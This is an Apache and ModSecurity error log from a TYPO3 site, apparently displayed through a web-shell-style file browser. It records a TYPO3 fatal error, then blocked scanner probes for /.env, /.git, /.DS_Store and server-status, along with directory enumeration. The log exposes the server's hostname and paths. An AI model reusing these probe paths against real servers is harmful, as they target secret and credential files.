Your IP : 216.73.216.189
| Current Path : /var/www/surf/log/ |
|
|
| Current File : /var/www/surf/log/error.log |
[Mon Nov 27 16:49:42.390131 2023] [php:error] [pid 3471050] [client 31.188.185.127:52774] PHP Fatal error: Uncaught RuntimeException: Could not create directory "/var/www/surf/TYPO3/var/log/"! in /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Utility/GeneralUtility.php:1805\nStack trace:\n#0 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Utility/GeneralUtility.php(1773): TYPO3\\CMS\\Core\\Utility\\GeneralUtility::createDirectoryPath()\n#1 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/Writer/FileWriter.php(212): TYPO3\\CMS\\Core\\Utility\\GeneralUtility::mkdir_deep()\n#2 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/Writer/FileWriter.php(178): TYPO3\\CMS\\Core\\Log\\Writer\\FileWriter->createLogFile()\n#3 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/Writer/FileWriter.php(111): TYPO3\\CMS\\Core\\Log\\Writer\\FileWriter->openLogFile()\n#4 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/Writer/FileWriter.php(70): TYPO3\\CMS\\Core\\Log\\Writer\\FileWriter->setLogFile()\n#5 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Utility/GeneralUtility.php(2967): TYPO3\\CMS\\Core\\Log\\Writer\\FileWriter->__construct()\n#6 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/LogManager.php(145): TYPO3\\CMS\\Core\\Utility\\GeneralUtility::makeInstance()\n#7 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/LogManager.php(106): TYPO3\\CMS\\Core\\Log\\LogManager->setWritersForLogger()\n#8 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Log/LogManager.php(97): TYPO3\\CMS\\Core\\Log\\LogManager->makeLogger()\n#9 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Utility/GeneralUtility.php(2973): TYPO3\\CMS\\Core\\Log\\LogManager->getLogger()\n#10 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Core/Bootstrap.php(445): TYPO3\\CMS\\Core\\Utility\\GeneralUtility::makeInstance()\n#11 /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Core/Bootstrap.php(94): TYPO3\\CMS\\Core\\Core\\Bootstrap::initializeErrorHandling()\n#12 /var/www/surf/TYPO3/public/index.php(20): TYPO3\\CMS\\Core\\Core\\Bootstrap::init()\n#13 /var/www/surf/TYPO3/public/index.php(21): {closure}()\n#14 {main}\n thrown in /var/www/surf/TYPO3/vendor/typo3/cms-core/Classes/Utility/GeneralUtility.php on line 1805
[Mon Nov 27 17:22:17.825369 2023] [authz_core:error] [pid 3472889] [client 64.227.126.135:55894] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Mon Nov 27 17:22:18.475546 2023] [:error] [pid 3472892] [client 64.227.126.135:56112] [client 64.227.126.135] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZWTCOrtwZ1Pl5xt0STx_jwAAAAg"]
[Mon Nov 27 17:22:18.475773 2023] [:error] [pid 3472892] [client 64.227.126.135:56112] [client 64.227.126.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZWTCOrtwZ1Pl5xt0STx_jwAAAAg"]
[Mon Nov 27 17:22:18.475927 2023] [:error] [pid 3472892] [client 64.227.126.135:56112] [client 64.227.126.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZWTCOrtwZ1Pl5xt0STx_jwAAAAg"]
[Mon Nov 27 17:22:18.515355 2023] [:error] [pid 3472898] [client 64.227.126.135:56118] [client 64.227.126.135] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZWTCOq1V3FsiVwnY5MSUPwAAAA0"]
[Mon Nov 27 17:22:18.515680 2023] [:error] [pid 3472898] [client 64.227.126.135:56118] [client 64.227.126.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZWTCOq1V3FsiVwnY5MSUPwAAAA0"]
[Mon Nov 27 17:22:18.515887 2023] [:error] [pid 3472898] [client 64.227.126.135:56118] [client 64.227.126.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZWTCOq1V3FsiVwnY5MSUPwAAAA0"]
[Mon Nov 27 17:22:18.554219 2023] [authz_core:error] [pid 3472892] [client 64.227.126.135:56124] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Nov 27 17:23:58.365961 2023] [authz_core:error] [pid 3472899] [client 193.143.1.139:39902] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 30 10:47:16.902828 2023] [:error] [pid 3526809] [client 15.237.215.110:59214] [client 15.237.215.110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZWhaJDodQZmyUK-iupBzNAAAAAE"]
[Thu Nov 30 10:47:16.904091 2023] [:error] [pid 3526809] [client 15.237.215.110:59214] [client 15.237.215.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZWhaJDodQZmyUK-iupBzNAAAAAE"]
[Thu Nov 30 10:47:16.904277 2023] [:error] [pid 3526809] [client 15.237.215.110:59214] [client 15.237.215.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZWhaJDodQZmyUK-iupBzNAAAAAE"]
[Thu Nov 30 18:29:53.138107 2023] [authz_core:error] [pid 3534013] [client 15.237.215.110:41844] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 27 02:55:10.700349 2024] [authz_core:error] [pid 672142] [client 164.90.205.35:57744] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sat Jan 27 02:55:10.988659 2024] [:error] [pid 672140] [client 164.90.205.35:58256] [client 164.90.205.35] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZbRiftFW4HkE1Ks7UeiHwgAAAAY"]
[Sat Jan 27 02:55:10.988889 2024] [:error] [pid 672140] [client 164.90.205.35:58256] [client 164.90.205.35] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZbRiftFW4HkE1Ks7UeiHwgAAAAY"]
[Sat Jan 27 02:55:10.989052 2024] [:error] [pid 672140] [client 164.90.205.35:58256] [client 164.90.205.35] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZbRiftFW4HkE1Ks7UeiHwgAAAAY"]
[Sat Jan 27 02:55:11.078799 2024] [:error] [pid 672140] [client 164.90.205.35:58306] [client 164.90.205.35] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbRif9FW4HkE1Ks7UeiHwwAAAAY"]
[Sat Jan 27 02:55:11.079023 2024] [:error] [pid 672140] [client 164.90.205.35:58306] [client 164.90.205.35] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbRif9FW4HkE1Ks7UeiHwwAAAAY"]
[Sat Jan 27 02:55:11.079196 2024] [:error] [pid 672140] [client 164.90.205.35:58306] [client 164.90.205.35] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbRif9FW4HkE1Ks7UeiHwwAAAAY"]
[Sat Jan 27 02:55:11.170323 2024] [authz_core:error] [pid 672108] [client 164.90.205.35:58386] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 27 02:55:25.243733 2024] [authz_core:error] [pid 672139] [client 193.143.1.139:37598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 27 02:55:31.627769 2024] [:error] [pid 672141] [client 171.67.70.229:59276] [client 171.67.70.229] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbRik-eNQa6NUE0omyThtAAAAAc"]
[Sat Jan 27 02:55:31.628170 2024] [:error] [pid 672141] [client 171.67.70.229:59276] [client 171.67.70.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbRik-eNQa6NUE0omyThtAAAAAc"]
[Sat Jan 27 02:55:31.628363 2024] [:error] [pid 672141] [client 171.67.70.229:59276] [client 171.67.70.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbRik-eNQa6NUE0omyThtAAAAAc"]
[Sat Jan 27 06:55:32.334550 2024] [:error] [pid 672272] [client 171.67.70.233:59930] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbSa1GkE98jbt2vUjgg2ngAAAAE"]
[Sat Jan 27 06:55:32.335307 2024] [:error] [pid 672272] [client 171.67.70.233:59930] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbSa1GkE98jbt2vUjgg2ngAAAAE"]
[Sat Jan 27 06:55:32.335625 2024] [:error] [pid 672272] [client 171.67.70.233:59930] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ZbSa1GkE98jbt2vUjgg2ngAAAAE"]
[Sat Feb 03 11:51:47.868934 2024] [authz_core:error] [pid 830786] [client 193.32.162.87:60596] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Mar 27 03:07:04.636359 2024] [authz_core:error] [pid 2071164] [client 23.239.4.252:50096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Wed Mar 27 03:07:06.242415 2024] [:error] [pid 2071168] [client 23.239.4.252:50112] [client 23.239.4.252] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZgN_SrGrhPLJJhLQonLExAAAAAQ"]
[Wed Mar 27 03:07:06.242951 2024] [:error] [pid 2071168] [client 23.239.4.252:50112] [client 23.239.4.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZgN_SrGrhPLJJhLQonLExAAAAAQ"]
[Wed Mar 27 03:07:06.243393 2024] [:error] [pid 2071168] [client 23.239.4.252:50112] [client 23.239.4.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZgN_SrGrhPLJJhLQonLExAAAAAQ"]
[Wed Mar 27 03:07:06.760462 2024] [:error] [pid 2071204] [client 23.239.4.252:50116] [client 23.239.4.252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZgN_SqfAj9q6kelVCvSAeQAAAAg"]
[Wed Mar 27 03:07:06.761005 2024] [:error] [pid 2071204] [client 23.239.4.252:50116] [client 23.239.4.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZgN_SqfAj9q6kelVCvSAeQAAAAg"]
[Wed Mar 27 03:07:06.761441 2024] [:error] [pid 2071204] [client 23.239.4.252:50116] [client 23.239.4.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZgN_SqfAj9q6kelVCvSAeQAAAAg"]
[Wed Mar 27 03:07:07.279291 2024] [authz_core:error] [pid 2071210] [client 23.239.4.252:33296] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 29 02:25:36.034519 2024] [authz_core:error] [pid 2112772] [client 100.26.55.199:49092] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Mar 30 23:53:03.751539 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:42978] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Sat Mar 30 23:53:03.751994 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:42998] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/beta
[Sat Mar 30 23:53:03.760401 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:42984] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Sat Mar 30 23:53:03.765151 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43020] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/blog
[Sat Mar 30 23:53:03.769846 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43032] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/build
[Sat Mar 30 23:53:03.775236 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43048] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cms
[Sat Mar 30 23:53:03.776245 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43012] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/blog
[Sat Mar 30 23:53:03.789883 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43066] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.794864 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43074] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.806042 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.850743 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43096] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.852712 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43080] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/a
[Sat Mar 30 23:53:03.859359 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43104] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.866158 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43118] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aomanalyzer
[Sat Mar 30 23:53:03.868587 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43132] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.872070 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43146] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.891285 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43152] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.898664 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43178] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/common
[Sat Mar 30 23:53:03.909430 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43196] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/data
[Sat Mar 30 23:53:03.912895 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43168] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Mar 30 23:53:03.953114 2024] [authz_core:error] [pid 2140884] [client 91.215.85.43:43194] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database
[Sat Mar 30 23:53:03.953558 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43212] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/developer
[Sat Mar 30 23:53:03.957565 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:03.967208 2024] [authz_core:error] [pid 2140628] [client 91.215.85.43:43248] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/gateway
[Sat Mar 30 23:53:03.967436 2024] [authz_core:error] [pid 2143542] [client 91.215.85.43:43206] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/demo
[Sat Mar 30 23:53:03.970520 2024] [authz_core:error] [pid 2143544] [client 91.215.85.43:43222] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dev
[Sat Mar 30 23:53:03.987389 2024] [authz_core:error] [pid 2140505] [client 91.215.85.43:43252] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application
[Sat Mar 30 23:53:03.999450 2024] [authz_core:error] [pid 2140506] [client 91.215.85.43:43240] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/flock
[Sat Mar 30 23:53:04.006336 2024] [authz_core:error] [pid 2140509] [client 91.215.85.43:43262] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Mar 30 23:53:04.017817 2024] [authz_core:error] [pid 2140507] [client 91.215.85.43:43278] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 30 23:53:04.055174 2024] [authz_core:error] [pid 2140508] [client 91.215.85.43:43320] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/includes
[Sat Mar 30 23:53:04.056825 2024] [authz_core:error] [pid 2140504] [client 91.215.85.43:43294] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
